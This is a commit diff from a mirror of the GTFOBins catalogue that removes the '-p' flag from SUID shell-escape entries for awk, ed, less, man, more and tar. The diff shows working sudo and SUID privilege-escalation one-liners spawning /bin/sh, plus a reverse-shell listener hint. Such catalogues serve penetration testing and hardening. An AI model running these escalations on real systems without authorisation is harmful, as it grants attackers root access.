public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-10-31 00:38:54 +01:00
Code Issues Projects Releases Wiki Activity

Remove the -p option from suid-limited

Browse Source 
It is useless because:
- if Debian-like, it is not supported and does not drop anyway;
- otherwise the `system()`-like function already used a shell that dropped the
  privileges.
This commit is contained in:
Andrea Cardaci
2018-05-25 00:57:42 +02:00
parent 84f48081fb
commit e885d4a6ee
7 changed files with 12 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
_data/functions.yml
View File

@@ -12,7 +12,7 @@ suid-enabled:
suid-limited: suid-limited:
label: Limited SUID label: Limited SUID
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems (if that's the case don't use the `-p` option). description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems.
sudo-enabled: sudo-enabled:
label: Sudo label: Sudo

2
_gtfobins/awk.md
View File

@@ -5,7 +5,7 @@ functions:
sudo-enabled: sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh")}' - code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited: suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh -p")}' - code: ./awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive: reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |

2
_gtfobins/ed.md
View File

@@ -11,5 +11,5 @@ functions:
suid-limited: suid-limited:
- code: |- - code: |-
./ed ./ed
!/bin/sh -p !/bin/sh
--- ---

2
_gtfobins/less.md
View File

@@ -14,5 +14,5 @@ functions:
suid-limited: suid-limited:
- code: |- - code: |-
./less /etc/profile ./less /etc/profile
!/bin/sh -p !/bin/sh
--- ---

2
_gtfobins/man.md
View File

@@ -11,5 +11,5 @@ functions:
suid-limited: suid-limited:
- code: |- - code: |-
./man man ./man man
!/bin/sh -p !/bin/sh
--- ---

2
_gtfobins/more.md
View File

@@ -11,5 +11,5 @@ functions:
suid-limited: suid-limited:
- code: |- - code: |-
TERM= ./more /etc/profile TERM= ./more /etc/profile
!/bin/sh -p !/bin/sh
--- ---

2
_gtfobins/tar.md
View File

@@ -5,5 +5,5 @@ functions:
sudo-enabled: sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited: suid-limited:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p" - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh"
--- ---